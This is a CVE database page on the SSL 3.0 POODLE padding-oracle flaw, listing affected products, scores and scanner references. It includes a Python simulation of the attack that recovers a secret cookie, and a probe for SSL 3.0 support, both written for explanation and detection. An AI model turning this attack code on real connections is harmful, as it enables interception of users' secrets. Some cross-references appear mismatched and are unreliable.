ID CVE-2014-3566
Summary The SSL protocol 3.0, as used in OpenSSL through 1.0.1i and other products, uses nondeterministic CBC padding, which makes it easier for man-in-the-middle attackers to obtain cleartext data via a padding-oracle attack, aka the "POODLE" issue.
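The summary above is the whole mechanism: SSL 3.0 CBC records end in pad || pad_len, the receiver checks only pad_len, and the pad bytes are unspecified, so a man-in-the-middle who can move one ciphertext block into the final position learns one plaintext byte whenever the record is accepted. The following simulation is an added example, not code from this page or from OpenSSL. A 4-round Feistel network over HMAC-SHA256 stands in for AES/3DES (the attack does not depend on the block cipher), a fresh random IV per record replaces SSL 3.0's IV chaining, and the secret, key material and request framing (b"A"/b"B" filler, a constructed cookie) are assumptions. The record layout, the SSL 3.0 padding check, and the attacker's block substitution are the real ones; ssl3_open(check_pad_bytes=True) shows the TLS 1.0 rule that closes the oracle.

```python
# Added POODLE (CVE-2014-3566) simulation, not code from the CVE page or OpenSSL. A 4-round
# Feistel network over HMAC-SHA256 stands in for AES/3DES (the attack is cipher-agnostic);
# the record layout, SSL 3.0 padding rule and block substitution are the real ones.
import hashlib
import hmac
import os

BLOCK, MAC_LEN, ROUNDS = 16, 20, 4  # CBC block size, SHA-1 MAC length, toy-cipher rounds

def _xor(a, b):
    return bytes(x ^ y for x, y in zip(a, b))

def _f(key, half, rnd):  # keyed round function of the toy block cipher (assumption)
    return hmac.new(key, bytes([rnd]) + half, hashlib.sha256).digest()[:BLOCK // 2]

def block_encrypt(key, blk):
    l, r = blk[:BLOCK // 2], blk[BLOCK // 2:]
    for i in range(ROUNDS):
        l, r = r, _xor(l, _f(key, r, i))
    return l + r

def block_decrypt(key, blk):
    l, r = blk[:BLOCK // 2], blk[BLOCK // 2:]
    for i in reversed(range(ROUNDS)):
        l, r = _xor(r, _f(key, l, i)), l
    return l + r

def cbc_encrypt(key, iv, pt):
    out, prev = [], iv
    for i in range(0, len(pt), BLOCK):
        prev = block_encrypt(key, _xor(pt[i:i + BLOCK], prev))
        out.append(prev)
    return b"".join(out)

def cbc_decrypt(key, iv, ct):
    out, prev = [], iv
    for i in range(0, len(ct), BLOCK):
        out.append(_xor(block_decrypt(key, ct[i:i + BLOCK]), prev))
        prev = ct[i:i + BLOCK]
    return b"".join(out)

def ssl3_seal(enc_key, mac_key, iv, data):
    # SSL 3.0 GenericBlockCipher, MAC-then-encrypt: data || MAC || pad || pad_len.
    # SSL 3.0 leaves the pad bytes unspecified (random here); pad_len < BLOCK.
    body = data + hmac.new(mac_key, data, hashlib.sha1).digest()
    pad_len = (BLOCK - (len(body) + 1) % BLOCK) % BLOCK
    body += os.urandom(pad_len) + bytes([pad_len])
    return cbc_encrypt(enc_key, iv, body)

def ssl3_open(enc_key, mac_key, iv, ct, check_pad_bytes=False):
    # SSL 3.0 inspects only the final pad_len byte: that is the oracle. check_pad_bytes=True
    # adds the TLS 1.0 rule that every pad byte must equal pad_len, which closes it.
    pt = cbc_decrypt(enc_key, iv, ct)
    pad_len = pt[-1]
    if pad_len >= BLOCK or pad_len + 1 + MAC_LEN > len(pt):
        return False
    if check_pad_bytes and any(b != pad_len for b in pt[-(pad_len + 1):-1]):
        return False
    data_len = len(pt) - pad_len - 1 - MAC_LEN
    data, mac = pt[:data_len], pt[data_len:data_len + MAC_LEN]
    return hmac.compare_digest(mac, hmac.new(mac_key, data, hashlib.sha1).digest())

class Session:
    # Victim browser + server. The attacker only chooses request prefix/suffix lengths (what
    # injected JavaScript gives a POODLE attacker) and rewrites ciphertext on the wire.
    def __init__(self, secret, strict_padding=False):
        self.enc_key, self.mac_key = os.urandom(16), os.urandom(16)
        self.secret, self.strict = secret, strict_padding

    def client_send(self, prefix_len, suffix_len):
        iv = os.urandom(BLOCK)  # fresh IV per record (simplifies SSL 3.0 IV chaining)
        data = b"A" * prefix_len + self.secret + b"B" * suffix_len
        return iv, ssl3_seal(self.enc_key, self.mac_key, iv, data)

    def server_accepts(self, iv, ct):
        return ssl3_open(self.enc_key, self.mac_key, iv, ct, self.strict)

def poodle_recover_byte(session, secret_len, k, max_tries=60000):
    # Put secret[k] in the last byte of block C_i and make the final block C_n pure padding,
    # then copy C_i over C_n: the server accepts iff the decrypted last byte == BLOCK-1 (1/256).
    prefix_len = (BLOCK - 1 - k) % BLOCK                       # secret[k] ends a block
    suffix_len = -(prefix_len + secret_len + MAC_LEN) % BLOCK  # data+MAC fill whole blocks
    i = (prefix_len + k) // BLOCK                              # 0-based index of C_i
    for _ in range(max_tries):
        iv, ct = session.client_send(prefix_len, suffix_len)
        c = [iv] + [ct[j:j + BLOCK] for j in range(0, len(ct), BLOCK)]  # c[0]=IV, c[j]=C_j
        if session.server_accepts(iv, ct[:-BLOCK] + c[i + 1]):
            # server saw D(C_i) ^ C_{n-1} = P_i ^ C_{i-1} ^ C_{n-1} with last byte BLOCK-1
            return (BLOCK - 1) ^ c[i][-1] ^ c[-2][-1]
    return None  # every rejected try is a fatal alert on the wire, hence the IDS rules

def poodle_recover(session, secret_len, max_tries=60000):
    out = bytearray()
    for k in range(secret_len):
        b = poodle_recover_byte(session, secret_len, k, max_tries)
        if b is None:
            return None
        out.append(b)
    return bytes(out)
```

poodle_recover(Session(b"sid=7f3a"), 8) returns the cookie after roughly 256 forged records per byte; against Session(..., strict_padding=True) the same loop never gets an acceptance, because the substituted block would also have to carry fifteen correct pad bytes. Each rejected record is a fatal bad_record_mac and a torn-down connection, which is the traffic pattern the Suricata rule listed further down on this page keys on.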
References
Vulnerable Configurations
  • Red Hat Enterprise Linux 5
    cpe:2.3:o:redhat:enterprise_linux:5
  • Red Hat Enterprise Linux Desktop Supplementary 6.0 (v. 6)
    cpe:2.3:o:redhat:enterprise_linux_desktop_supplementary:6.0
  • Red Hat Enterprise Linux Workstation Supplementary 6.0 (v. 6)
    cpe:2.3:o:redhat:enterprise_linux_workstation_supplementary:6.0
  • Red Hat Enterprise Linux Server Supplementary 6.0 (v. 6)
    cpe:2.3:o:redhat:enterprise_linux_server_supplementary:6.0
  • Red Hat Enterprise Linux Workstation Supplementary 7.0
    cpe:2.3:o:redhat:enterprise_linux_workstation_supplementary:7.0
  • Red Hat Enterprise Linux Server Supplementary 7.0
    cpe:2.3:o:redhat:enterprise_linux_server_supplementary:7.0
  • cpe:2.3:o:redhat:enterprise_linux_desktop_supplementary:76.0
    cpe:2.3:o:redhat:enterprise_linux_desktop_supplementary:76.0
  • Red Hat Enterprise Linux Server Supplementary 5.0
    cpe:2.3:o:redhat:enterprise_linux_server_supplementary:5.0
  • Red Hat Enterprise Linux Desktop Supplementary 5.0
    cpe:2.3:o:redhat:enterprise_linux_desktop_supplementary:5.0
  • Red Hat Enterprise Linux Workstation 7.0
    cpe:2.3:o:redhat:enterprise_linux_workstation:7.0
  • Red Hat Enterprise Linux Workstation 6.0
    cpe:2.3:o:redhat:enterprise_linux_workstation:6.0
  • Red Hat Enterprise Linux Server 7.0
    cpe:2.3:o:redhat:enterprise_linux_server:7.0
  • Red Hat Enterprise Linux Server 6.0
    cpe:2.3:o:redhat:enterprise_linux_server:6.0
  • Red Hat Enterprise Linux Desktop 7.0
    cpe:2.3:o:redhat:enterprise_linux_desktop:7.0
  • Red Hat Enterprise Linux Desktop 6.0
    cpe:2.3:o:redhat:enterprise_linux_desktop:6.0
  • IBM AIX 7.1
    cpe:2.3:o:ibm:aix:7.1
  • IBM AIX 6.1
    cpe:2.3:o:ibm:aix:6.1
  • IBM AIX 5.3
    cpe:2.3:o:ibm:aix:5.3
  • Apple Mac OS X 10.10.1
    cpe:2.3:o:apple:mac_os_x:10.10.1
  • Mageia 4.0
    cpe:2.3:o:mageia:mageia:4.0
  • Mageia 3.0
    cpe:2.3:o:mageia:mageia:3.0
  • Novell SUSE Linux Enterprise Desktop 12.0
    cpe:2.3:o:novell:suse_linux_enterprise_desktop:12.0
  • Novell SUSE Linux Enterprise Desktop 10.0
    cpe:2.3:o:novell:suse_linux_enterprise_desktop:10.0
  • Novell SUSE Linux Enterprise Desktop 9.0
    cpe:2.3:o:novell:suse_linux_enterprise_desktop:9.0
  • Novell SUSE Linux Enterprise Desktop 11.0
    cpe:2.3:o:novell:suse_linux_enterprise_desktop:11.0
  • Novell SUSE Linux Enterprise Software Development Kit 12.0
    cpe:2.3:o:novell:suse_linux_enterprise_software_development_kit:12.0
  • Novell SUSE Linux Enterprise Server 12.0
    cpe:2.3:o:novell:suse_linux_enterprise_server:12.0
  • Novell SUSE Linux Enterprise Software Development Kit 11.0 SP3
    cpe:2.3:o:novell:suse_linux_enterprise_software_development_kit:11.0:sp3
  • Novell SUSE Linux Enterprise Server 11.0 SP3 (VMware)
    cpe:2.3:o:novell:suse_linux_enterprise_server:11.0:sp3:-:-:-:vmware
  • Novell SUSE Linux Enterprise Server 11.0 Service Pack 3
    cpe:2.3:o:novell:suse_linux_enterprise_server:11.0:sp3
  • Novell openSUSE 13.1
    cpe:2.3:o:novell:opensuse:13.1
  • Novell openSUSE 12.3
    cpe:2.3:o:novell:opensuse:12.3
  • Fedora 21
    cpe:2.3:o:fedoraproject:fedora:21
  • Fedora 20
    cpe:2.3:o:fedoraproject:fedora:20
  • Fedora 19
    cpe:2.3:o:fedoraproject:fedora:19
  • OpenSSL Project OpenSSL 0.9.8zb
    cpe:2.3:a:openssl:openssl:0.9.8zb
  • OpenSSL Project OpenSSL 0.9.8za
    cpe:2.3:a:openssl:openssl:0.9.8za
  • OpenSSL Project OpenSSL 0.9.8z
    cpe:2.3:a:openssl:openssl:0.9.8z
  • OpenSSL Project OpenSSL 0.9.8y
    cpe:2.3:a:openssl:openssl:0.9.8y
  • OpenSSL Project OpenSSL 0.9.8x
    cpe:2.3:a:openssl:openssl:0.9.8x
  • OpenSSL Project OpenSSL 0.9.8w
    cpe:2.3:a:openssl:openssl:0.9.8w
  • OpenSSL Project OpenSSL 0.9.8v
    cpe:2.3:a:openssl:openssl:0.9.8v
  • OpenSSL Project OpenSSL 0.9.8u
    cpe:2.3:a:openssl:openssl:0.9.8u
  • OpenSSL Project OpenSSL 0.9.8t
    cpe:2.3:a:openssl:openssl:0.9.8t
  • OpenSSL Project OpenSSL 0.9.8s
    cpe:2.3:a:openssl:openssl:0.9.8s
  • OpenSSL Project OpenSSL 0.9.8r
    cpe:2.3:a:openssl:openssl:0.9.8r
  • OpenSSL Project OpenSSL 0.9.8q
    cpe:2.3:a:openssl:openssl:0.9.8q
  • OpenSSL Project OpenSSL 0.9.8p
    cpe:2.3:a:openssl:openssl:0.9.8p
  • OpenSSL Project OpenSSL 0.9.8o
    cpe:2.3:a:openssl:openssl:0.9.8o
  • OpenSSL Project OpenSSL 0.9.8n
    cpe:2.3:a:openssl:openssl:0.9.8n
  • OpenSSL Project OpenSSL 0.9.8m Beta1
    cpe:2.3:a:openssl:openssl:0.9.8m:beta1
  • OpenSSL Project OpenSSL 0.9.8m
    cpe:2.3:a:openssl:openssl:0.9.8m
  • OpenSSL Project OpenSSL 0.9.8l
    cpe:2.3:a:openssl:openssl:0.9.8l
  • OpenSSL Project OpenSSL 0.9.8k
    cpe:2.3:a:openssl:openssl:0.9.8k
  • OpenSSL Project OpenSSL 0.9.8j
    cpe:2.3:a:openssl:openssl:0.9.8j
  • OpenSSL Project OpenSSL 0.9.8i
    cpe:2.3:a:openssl:openssl:0.9.8i
  • OpenSSL Project OpenSSL 0.9.8h
    cpe:2.3:a:openssl:openssl:0.9.8h
  • OpenSSL Project OpenSSL 0.9.8g
    cpe:2.3:a:openssl:openssl:0.9.8g
  • OpenSSL Project OpenSSL 0.9.8f
    cpe:2.3:a:openssl:openssl:0.9.8f
  • OpenSSL Project OpenSSL 0.9.8e
    cpe:2.3:a:openssl:openssl:0.9.8e
  • OpenSSL Project OpenSSL 0.9.8d
    cpe:2.3:a:openssl:openssl:0.9.8d
  • OpenSSL Project OpenSSL 0.9.8c
    cpe:2.3:a:openssl:openssl:0.9.8c
  • OpenSSL Project OpenSSL 0.9.8b
    cpe:2.3:a:openssl:openssl:0.9.8b
  • OpenSSL Project OpenSSL 0.9.8a
    cpe:2.3:a:openssl:openssl:0.9.8a
  • OpenSSL Project OpenSSL 0.9.8
    cpe:2.3:a:openssl:openssl:0.9.8
  • OpenSSL Project OpenSSL 1.0.0n
    cpe:2.3:a:openssl:openssl:1.0.0n
  • OpenSSL Project OpenSSL 1.0.0m
    cpe:2.3:a:openssl:openssl:1.0.0m
  • OpenSSL Project OpenSSL 1.0.0l
    cpe:2.3:a:openssl:openssl:1.0.0l
  • OpenSSL Project OpenSSL 1.0.0k
    cpe:2.3:a:openssl:openssl:1.0.0k
  • OpenSSL Project OpenSSL 1.0.0j
    cpe:2.3:a:openssl:openssl:1.0.0j
  • OpenSSL Project OpenSSL 1.0.0i
    cpe:2.3:a:openssl:openssl:1.0.0i
  • OpenSSL Project OpenSSL 1.0.0h
    cpe:2.3:a:openssl:openssl:1.0.0h
  • OpenSSL Project OpenSSL 1.0.0g
    cpe:2.3:a:openssl:openssl:1.0.0g
  • OpenSSL Project OpenSSL 1.0.0f
    cpe:2.3:a:openssl:openssl:1.0.0f
  • OpenSSL Project OpenSSL 1.0.0e
    cpe:2.3:a:openssl:openssl:1.0.0e
  • OpenSSL Project OpenSSL 1.0.0d
    cpe:2.3:a:openssl:openssl:1.0.0d
  • OpenSSL Project OpenSSL 1.0.0c
    cpe:2.3:a:openssl:openssl:1.0.0c
  • OpenSSL Project OpenSSL 1.0.0b
    cpe:2.3:a:openssl:openssl:1.0.0b
  • OpenSSL Project OpenSSL 1.0.0a
    cpe:2.3:a:openssl:openssl:1.0.0a
  • OpenSSL Project OpenSSL 1.0.0 Beta5
    cpe:2.3:a:openssl:openssl:1.0.0:beta5
  • OpenSSL Project OpenSSL 1.0.0 Beta4
    cpe:2.3:a:openssl:openssl:1.0.0:beta4
  • OpenSSL Project OpenSSL 1.0.0 Beta3
    cpe:2.3:a:openssl:openssl:1.0.0:beta3
  • OpenSSL Project OpenSSL 1.0.0 Beta2
    cpe:2.3:a:openssl:openssl:1.0.0:beta2
  • OpenSSL Project OpenSSL 1.0.0 Beta1
    cpe:2.3:a:openssl:openssl:1.0.0:beta1
  • OpenSSL Project OpenSSL 1.0.0
    cpe:2.3:a:openssl:openssl:1.0.0
  • OpenSSL Project OpenSSL 1.0.1h
    cpe:2.3:a:openssl:openssl:1.0.1h
  • OpenSSL Project OpenSSL 1.0.1g
    cpe:2.3:a:openssl:openssl:1.0.1g
  • OpenSSL Project OpenSSL 1.0.1f
    cpe:2.3:a:openssl:openssl:1.0.1f
  • OpenSSL Project OpenSSL 1.0.1e
    cpe:2.3:a:openssl:openssl:1.0.1e
  • OpenSSL Project OpenSSL 1.0.1d
    cpe:2.3:a:openssl:openssl:1.0.1d
  • OpenSSL Project OpenSSL 1.0.1c
    cpe:2.3:a:openssl:openssl:1.0.1c
  • OpenSSL Project OpenSSL 1.0.1b
    cpe:2.3:a:openssl:openssl:1.0.1b
  • OpenSSL Project OpenSSL 1.0.1a
    cpe:2.3:a:openssl:openssl:1.0.1a
  • OpenSSL Project OpenSSL 1.0.1 Beta3
    cpe:2.3:a:openssl:openssl:1.0.1:beta3
  • OpenSSL Project OpenSSL 1.0.1 Beta2
    cpe:2.3:a:openssl:openssl:1.0.1:beta2
  • OpenSSL Project OpenSSL 1.0.1 Beta1
    cpe:2.3:a:openssl:openssl:1.0.1:beta1
  • OpenSSL Project OpenSSL 1.0.1
    cpe:2.3:a:openssl:openssl:1.0.1
  • OpenSSL Project OpenSSL 1.0.1i
    cpe:2.3:a:openssl:openssl:1.0.1i
  • IBM Virtual I/O Server (VIOS) 2.2.3.4
    cpe:2.3:o:ibm:vios:2.2.3.4
  • IBM VIOS 2.2.3.3
    cpe:2.3:o:ibm:vios:2.2.3.3
  • IBM VIOS 2.2.3.2
    cpe:2.3:o:ibm:vios:2.2.3.2
  • IBM Virtual I/O Server (VIOS) 2.2.3.1
    cpe:2.3:o:ibm:vios:2.2.3.1
  • IBM VIOS 2.2.3.0
    cpe:2.3:o:ibm:vios:2.2.3.0
  • IBM VIOS 2.2.2.5
    cpe:2.3:o:ibm:vios:2.2.2.5
  • IBM VIOS 2.2.2.4
    cpe:2.3:o:ibm:vios:2.2.2.4
  • IBM Virtual I/O Server (VIOS) 2.2.2.3
    cpe:2.3:o:ibm:vios:2.2.2.3
  • IBM Virtual I/O Server (VIOS) 2.2.2.2
    cpe:2.3:o:ibm:vios:2.2.2.2
  • IBM Virtual I/O Server (VIOS) 2.2.2.1
    cpe:2.3:o:ibm:vios:2.2.2.1
  • IBM VIOS 2.2.2.0
    cpe:2.3:o:ibm:vios:2.2.2.0
  • IBM VIOS 2.2.1.9
    cpe:2.3:o:ibm:vios:2.2.1.9
  • IBM VIOS 2.2.1.8
    cpe:2.3:o:ibm:vios:2.2.1.8
  • IBM Virtual I/O Server (VIOS) 2.2.1.7
    cpe:2.3:o:ibm:vios:2.2.1.7
  • IBM Virtual I/O Server (VIOS) 2.2.1.6
    cpe:2.3:o:ibm:vios:2.2.1.6
  • IBM Virtual I/O Server (VIOS) 2.2.1.5
    cpe:2.3:o:ibm:vios:2.2.1.5
  • IBM VIOS 2.2.1.4
    cpe:2.3:o:ibm:vios:2.2.1.4
  • IBM VIOS 2.2.1.3
    cpe:2.3:o:ibm:vios:2.2.1.3
  • IBM VIOS 2.2.1.1
    cpe:2.3:o:ibm:vios:2.2.1.1
  • IBM VIOS 2.2.1.0
    cpe:2.3:o:ibm:vios:2.2.1.0
  • IBM VIOS 2.2.0.13
    cpe:2.3:o:ibm:vios:2.2.0.13
  • IBM VIOS 2.2.0.12
    cpe:2.3:o:ibm:vios:2.2.0.12
  • IBM VIOS 2.2.0.11
    cpe:2.3:o:ibm:vios:2.2.0.11
  • IBM VIOS 2.2.0.10
    cpe:2.3:o:ibm:vios:2.2.0.10
  • NetBSD 6.1.5
    cpe:2.3:o:netbsd:netbsd:6.1.5
  • NetBSD 6.1.4
    cpe:2.3:o:netbsd:netbsd:6.1.4
  • NetBSD 6.1.3
    cpe:2.3:o:netbsd:netbsd:6.1.3
  • NetBSD 6.1.2
    cpe:2.3:o:netbsd:netbsd:6.1.2
  • NetBSD 6.1.1
    cpe:2.3:o:netbsd:netbsd:6.1.1
  • NetBSD 6.1
    cpe:2.3:o:netbsd:netbsd:6.1
  • NetBSD 6.0.6
    cpe:2.3:o:netbsd:netbsd:6.0.6
  • NetBSD 6.0.5
    cpe:2.3:o:netbsd:netbsd:6.0.5
  • NetBSD 6.0.4
    cpe:2.3:o:netbsd:netbsd:6.0.4
  • NetBSD 6.0.3
    cpe:2.3:o:netbsd:netbsd:6.0.3
  • NetBSD 6.0.2
    cpe:2.3:o:netbsd:netbsd:6.0.2
  • NetBSD 6.0.1
    cpe:2.3:o:netbsd:netbsd:6.0.1
  • NetBSD 6.0 Beta
    cpe:2.3:o:netbsd:netbsd:6.0:beta
  • NetBSD 6.0
    cpe:2.3:o:netbsd:netbsd:6.0
  • NetBSD 5.1.4
    cpe:2.3:o:netbsd:netbsd:5.1.4
  • NetBSD 5.1.3
    cpe:2.3:o:netbsd:netbsd:5.1.3
  • NetBSD 5.1.2
    cpe:2.3:o:netbsd:netbsd:5.1.2
  • NetBSD 5.1.1
    cpe:2.3:o:netbsd:netbsd:5.1.1
  • NetBSD 5.1
    cpe:2.3:o:netbsd:netbsd:5.1
  • NetBSD 5.2.2
    cpe:2.3:o:netbsd:netbsd:5.2.2
  • NetBSD 5.2.1
    cpe:2.3:o:netbsd:netbsd:5.2.1
  • NetBSD 5.2
    cpe:2.3:o:netbsd:netbsd:5.2
  • Debian Linux 8.0 (Jessie)
    cpe:2.3:o:debian:debian_linux:8.0
  • Debian Linux 7.0
    cpe:2.3:o:debian:debian_linux:7.0
CVSS
Base: 4.3 (as of 15-10-2014 - 18:51)
Impact: 2.9
Exploitability: 8.6
CWE CWE-310
CAPEC
  • Signature Spoofing by Key Recreation
    An attacker obtains an authoritative or reputable signer's private signature key by exploiting a cryptographic weakness in the signature algorithm or pseudorandom number generation and then uses this key to forge signatures from the original signer to mislead a victim into performing actions that benefit the attacker.
Access
Vector: NETWORK
Complexity: MEDIUM
Authentication: NONE
Impact
Confidentiality: PARTIAL
Integrity: NONE
Availability: NONE
Bid vFeed
bidid 70574
Certvn vFeed
certvuid VU#577193
certvulink http://www.kb.cert.org/vuls/id/577193
Cisco vFeed
ciscoid cisco-sa-20141014
Debian vFeed
debianid DSA-3253
Fedora vFeed
fedoraid FEDORA-2014-13069
Gentoo vFeed
gentooid GLSA-201606-11
Hp vFeed
hpid HPSBGN03569
hplink http://marc.info/?l=bugtraq&m=145983526810210&w=2
Mandriva vFeed
mandrivaid MDVSA-2015:062
Msf vFeed
msf_script_file metasploit-framework/modules/auxiliary/scanner/http/ssl_version.rb
msf_script_name HTTP SSL/TLS Version Detection (POODLE scanner)
msfid ssl_version.rb
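The Metasploit module listed above and the nmap ssl-enum-ciphers script listed below both establish exposure the same way: offer the server an SSL 3.0 handshake with CBC suites and see whether it completes. The probe below is an added example, not the Metasploit module's or nmap's code. It builds a raw SSL 3.0 ClientHello that offers only CBC suites and classifies the first record the server returns; a ServerHello with version 3.0 means the server will still negotiate SSL 3.0 with a CBC suite, an alert or a closed connection means it will not. Host, port, timeout and the constructed replies used to exercise classify_response() offline are assumptions.

```python
# Added example (not the Metasploit ssl_version module or nmap's ssl-enum-ciphers): a raw
# SSL 3.0 ClientHello offering only CBC suites, plus a classifier for the server's reply.
import os
import socket
import struct
import time

SSL3 = b"\x03\x00"
# CBC suites a legacy server may accept under SSL 3.0; any of them negotiated = POODLE exposure.
CBC_SUITES = [0x002F, 0x0035, 0x000A, 0x0016, 0x0009]  # AES128, AES256, 3DES, DHE-3DES, DES (-SHA)

def build_sslv3_client_hello(suites=CBC_SUITES):
    random = struct.pack(">I", int(time.time())) + os.urandom(28)  # gmt_unix_time + 28 bytes
    body = SSL3 + random + b"\x00"                                  # client_version, random, empty session_id
    body += struct.pack(">H", 2 * len(suites)) + b"".join(struct.pack(">H", s) for s in suites)
    body += b"\x01\x00"                                             # compression_methods: [null]
    handshake = b"\x01" + len(body).to_bytes(3, "big") + body       # HandshakeType client_hello(1)
    return b"\x16" + SSL3 + struct.pack(">H", len(handshake)) + handshake  # ContentType handshake(22)

def classify_response(data):
    """Interpret the first record a server returned in answer to the SSL 3.0 ClientHello."""
    if len(data) < 5:
        return {"sslv3": False, "reason": "no record (connection closed or reset)"}
    ctype, rlen = data[0], int.from_bytes(data[3:5], "big")
    body = data[5:5 + rlen]
    if ctype == 0x15 and len(body) >= 2:                 # alert: SSL 3.0 refused
        return {"sslv3": False, "reason": "alert level=%d description=%d" % (body[0], body[1])}
    if ctype == 0x16 and len(body) >= 39 and body[0] == 0x02:  # server_hello
        version, sid_len = body[4:6], body[38]           # type(1) len(3) version(2) random(32) sid_len(1)
        suite = int.from_bytes(body[39 + sid_len:41 + sid_len], "big")
        return {"sslv3": version == SSL3, "suite": suite,
                "reason": "server_hello version=%d.%d suite=0x%04x" % (version[0], version[1], suite)}
    return {"sslv3": False, "reason": "unexpected content type %d" % ctype}

def probe(host, port=443, timeout=5.0):
    """Network check against a host/port of the caller's choice (assumed reachable)."""
    with socket.create_connection((host, port), timeout=timeout) as sock:
        sock.sendall(build_sslv3_client_hello())
        try:
            data = sock.recv(4096)
        except (ConnectionResetError, socket.timeout):
            data = b""
    return classify_response(data)
```

probe("legacy.example", 443) is the live check; the classifier reads only the first record, which is enough because a server that accepts SSL 3.0 answers with ServerHello first and a server that refuses it sends an alert (typically protocol_version or handshake_failure) or drops the connection. Offering RC4 as well would also reveal SSL 3.0 support, but only the CBC suites are what CVE-2014-3566 needs, so the probe leaves them out to avoid a false positive on an RC4-only legacy server.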
Nessus vFeed
nessus_script_family AIX Local Security Checks
nessus_script_file aix_IV73417.nasl
nessus_script_id 84269
nessus_script_name AIX 6.1 TL 9 : nettcp (IV73417) (POODLE)
Nmap vFeed
nmap_script_cat "discovery", "intrusive"
nmap_script_id ssl-enum-ciphers.nse
Openvas vFeed
openvas_script_family Fedora Local Security Checks
openvas_script_file gb_fedora_2014_15411_libuv_fc21.nasl
openvas_script_id 841059
openvas_script_name Fedora Update for libuv FEDORA-2014-15411
Oval vFeed
cpeid
ovalclass patch
ovalid oval:org.mitre.oval:def:28230
ovaltitle SUSE-SU-2014:1447-1 -- Security update for openwsman (moderate)
Redhat vFeed
redhatid RHSA-2015:0086
redhatovalid oval:com.redhat.rhsa:def:20150086
redhatupdatedesc RHSA-2015:0086: java-1.6.0-sun security update (Important)
Scip vFeed
scipid 67791
sciplink http://www.scip.ch/en/?vuldb.67791
Suricata vFeed
suricata_classtype attempted-recon
suricata_id sid:2019418
suricata_sig ET CURRENT_EVENTS SSL excessive fatal alerts (possible POODLE attack against server)
Suse vFeed
suseid openSUSE-SU-2015:0190
Ubuntu vFeed
ubuntuid USN-2487-1
Vmware vFeed
vmwareid VMSA-2015-0003
Redhat_Bugzilla vFeed
advisory_dateissue 2015-01-26
bugzillaid 1184277
bugzillatitle CVE-2015-0406 Oracle JDK: unspecified vulnerability fixed in 6u91, 7u75 and 8u31 (Deployment)
redhatid RHSA-2015:0086
Last major update 17-03-2015 - 02:00
Published 15-10-2014 - 00:55
Last modified 24-03-2017 - 01:59